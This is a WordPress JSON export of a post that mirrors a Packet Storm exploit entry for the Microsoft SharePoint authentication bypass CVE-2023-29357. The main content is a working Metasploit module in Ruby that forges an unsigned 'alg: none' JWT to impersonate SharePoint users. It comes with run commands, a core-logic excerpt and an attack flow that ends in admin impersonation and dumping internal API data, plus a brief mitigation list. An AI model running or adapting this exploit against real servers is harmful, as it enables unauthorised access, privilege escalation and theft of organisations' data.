{"id":27748,"date":"2025-11-26T12:50:38","date_gmt":"2025-11-26T12:50:38","guid":{"rendered":"http:\/\/localhost\/?p=27748"},"modified":"2025-11-26T12:50:38","modified_gmt":"2025-11-26T12:50:38","slug":"microsoft-sharepoint-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27748","title":{"rendered":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : SharePoint Authentication Bypass                                                                                            |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.microsoft.com\/en-us\/microsoft-365\/sharepoint\/collaboration                                                      |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    1. Summary :\\n       a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE\u20112023\u201129357. (https:\/\/packetstorm.news\/files\/id\/207960\/)\\n       The flaw allows an attacker to craft an unsigned JWT token with \\&#8221;alg\\&#8221;: \\&#8221;none\\&#8221; and impersonate any SharePoint user, \\n       including Site Administrators, without possessing valid credentials.\\n       The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.\\n    \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    How to Run the Exploit\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    ### **1. Save the script**\\n    \\n    Save the code as:\\n    \\n        ~\/.msf4\/modules\/auxiliary\/sharepoint\/cve_2023_29357.rb\\n    \\n    \\n    ### **2. Start it from terminal**\\n    \\n    msfconsole\\n    use auxiliary\/sharepoint\/cve_2023_29357\\n    set RHOSTS https:\/\/target.com\\n    run\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    auxiliary               :\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    ##\\n    # CVE\u20112023\u201129357 SharePoint Auth Bypass\\n    # by Indoushka \\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      include Msf::Exploit::Remote::HttpClient\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;SharePoint Auth Bypass (CVE\u20112023\u201129357)&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits an authentication bypass in Microsoft SharePoint\\n            (CVE\u20112023\u201129357) using a crafted JWT token with \\&#8221;alg\\&#8221;:\\&#8221;none\\&#8221;.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;Indoushka (Conversion to MSF)&#8217;\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2023-29357&#8217;]\\n          ]\\n        ))\\n    \\n        register_options(\\n          [\\n            OptString.new(&#8216;TARGETURI&#8217;, [ true, &#8216;Base SharePoint URL&#8217;, &#8216;\/&#8217; ])\\n          ]\\n        )\\n      end\\n    \\n      def create_jwt(aud, client_id)\\n        header = { alg: &#8216;none&#8217; }\\n        now = Time.now.to_i\\n        payload = {\\n          aud: aud,\\n          iss: client_id,\\n          nbf: now,\\n          exp: now + 3600,\\n          ver: \\&#8221;hashedprooftoken\\&#8221;,\\n          nameid: \\&#8221;#{client_id}@#{aud.split(&#8216;@&#8217;)[1]}\\&#8221;,\\n          endpointurl: \\&#8221;qqlAJmTxpB9A67xSyZk+tmrrNmYClY\/fqig7ceZNsSM=\\&#8221;,\\n          endpointurlLength: 1,\\n          isloopback: true\\n        }\\n    \\n        encoded_header  = Rex::Text.encode_base64url(header.to_json)\\n        encoded_payload = Rex::Text.encode_base64url(payload.to_json)\\n    \\n        \\&#8221;#{encoded_header}.#{encoded_payload}.AAA\\&#8221;\\n      end\\n    \\n      def get_realm\\n        res = send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(target_uri.path, \\&#8221;_api\/web\/siteusers\\&#8221;),\\n          &#8216;headers&#8217; =\\u003e { &#8216;Authorization&#8217; =\\u003e &#8216;Bearer &#8216; }\\n        }, 3)\\n    \\n        return nil unless res\\u0026.code == 401\\n    \\n        auth = res.headers[&#8216;WWW-Authenticate&#8217;]\\n        return nil unless auth\\n    \\n        realm = auth[\/realm=\\\\\\&#8221;([^\\\\\\&#8221;]+)\\\\\\&#8221;\/, 1]\\n        realm\\n      end\\n    \\n      def run\\n        client_id = \\&#8221;00000003-0000-0ff1-ce00-000000000000\\&#8221;\\n        print_status(\\&#8221;[*] Fetching realm\u2026\\&#8221;)\\n    \\n        realm = get_realm\\n    \\n        if realm.nil?\\n          print_error(\\&#8221;[-] Failed to extract realm\\&#8221;)\\n          return\\n        end\\n    \\n        print_good(\\&#8221;[+] Realm: #{realm}\\&#8221;)\\n    \\n        aud = \\&#8221;#{client_id}@#{realm}\\&#8221;\\n        jwt = create_jwt(aud, client_id)\\n    \\n        print_status(\\&#8221;[*] Trying authentication bypass\u2026\\&#8221;)\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(target_uri.path, \\&#8221;_api\/web\/siteusers\\&#8221;),\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;Authorization&#8217; =\\u003e \\&#8221;Bearer #{jwt}\\&#8221;,\\n            &#8216;X-PROOF_TOKEN&#8217; =\\u003e jwt,\\n            &#8216;Accept&#8217; =\\u003e &#8216;application\/json&#8217;\\n          }\\n        }, 5)\\n    \\n        if res \\u0026\\u0026 res.code == 200\\n          print_good(\\&#8221;[+] Authentication bypass success!\\&#8221;)\\n          if res.body\\n            print_line(res.body)\\n          end\\n        else\\n          print_error(\\&#8221;[-] Bypass failed. HTTP #{res\\u0026.code}\\&#8221;)\\n        end\\n      end\\n    end\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Technical Description ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2022 The attacker sends a request to:\\n          https:\/\/TARGET\/_api\/web\/siteusers\\n      This forces SharePoint to respond with a 401 and expose the Realm value.\\n    \\n    \u2022 The Realm is extracted from the \u201cWWW\u2011Authenticate\u201d header:\\n          Bearer realm=\\&#8221;XXXXXXXXXXXXXXXXXXXXXXXXXXXX\\&#8221;\\n    \\n    \u2022 The attacker forges a JWT token with:\\n          { \\&#8221;alg\\&#8221;: \\&#8221;none\\&#8221; }\\n    \\n    \u2022 The \u201caud\u201d field is constructed as:\\n          00000003-0000-0ff1-ce00-000000000000@REALM\\n    \\n    \u2022 The forged token is sent to SharePoint REST API endpoints.\\n    \\n    \u2022 SharePoint incorrectly validates the token and treats the attacker as an authenticated user.\\n    The following module performs:\\n    \\n    1. Realm extraction  \\n    2. Token forgery  \\n    3. Authentication bypass  \\n    4. Admin enumeration  \\n    5. Privilege validation  \\n    \\n    Core logic excerpt (Metasploit Ruby):\\n    \\n        jwt_header = { alg: \\&#8221;none\\&#8221; }.to_json\\n        jwt_payload = {\\n            aud: \\&#8221;#{client_id}@#{realm}\\&#8221;,\\n            iss: client_id,\\n            nbf: Time.now.to_i,\\n            exp: Time.now.to_i + 3600,\\n            ver: \\&#8221;hashedprooftoken\\&#8221;,\\n            nameid: \\&#8221;#{client_id}@#{realm}\\&#8221;,\\n            endpointurl: \\&#8221;qqlAJmTxpB9A67xSyZk+tmrrNmYClY\/fqig7ceZNsSM=\\&#8221;,\\n            endpointurlLength: 1,\\n            isloopback: true\\n        }.to_json\\n    \\n        unsigned_token = \\&#8221;#{b64(jwt_header)}.#{b64(jwt_payload)}.AAA\\&#8221;\\n    \\n        send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(&#8216;_api&#8217;, &#8216;web&#8217;, &#8216;currentuser&#8217;),\\n          &#8216;headers&#8217; =\\u003e {\\n              \\&#8221;Authorization\\&#8221; =\\u003e \\&#8221;Bearer #{unsigned_token}\\&#8221;,\\n              \\&#8221;X-PROOF_TOKEN\\&#8221; =\\u003e unsigned_token\\n          }\\n        })\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Attack Flow ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    1. Force 401 \u2192 Extract Realm  \\n    2. Build forged JWT  \\n    3. Bypass authentication  \\n    4. Enumerate site admins  \\n    5. Optional: Impersonate admin (SharePoint accepts spoofing)  \\n    6. Dump internal API data  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Impact ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2714 Full user enumeration  \\n    \u2714 Admin identification  \\n    \u2714 Access to restricted SharePoint API routes  \\n    \u2714 Potential privilege escalation  \\n    \u2714 Ability to chain with RCE vulnerabilities (CVE\u20112023\u201124955)  \\n    \u2714 Data leakage (lists, documents, users, groups\u2026)  \\n    \\n    Severity: **CRITICAL**\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Mitigation ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2022 Install the official Microsoft patch  \\n    \u2022 Enforce strict JWT signature verification  \\n    \u2022 Reject any token with \\&#8221;alg:none\\&#8221;  \\n    \u2022 Disable loopback trust token mode  \\n    \u2022 Monitor ULS logs for abnormal access patterns  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Conclusion ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    CVE\u20112023\u201129357 is a severe authentication bypass allowing attackers to impersonate\\n    any SharePoint user without credentials.  \\n    The vulnerability is trivial to exploit and provides high\u2011value access to internal\\n    SharePoint data and admin functions.\\n    \\n    Patch immediately.\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212111&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212111\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title :&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27748","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27748\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27748\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-26T12:50:38+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111\",\"datePublished\":\"2025-11-26T12:50:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"},\"wordCount\":1144,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\",\"name\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-26T12:50:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27748","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=27748","og_site_name":"zero redgem","article_published_time":"2025-11-26T12:50:38+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27748#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27748"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111","datePublished":"2025-11-26T12:50:38+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27748"},"wordCount":1144,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27748#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27748","url":"https:\/\/zero.redgem.net\/?p=27748","name":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-26T12:50:38+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27748#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27748"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27748#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 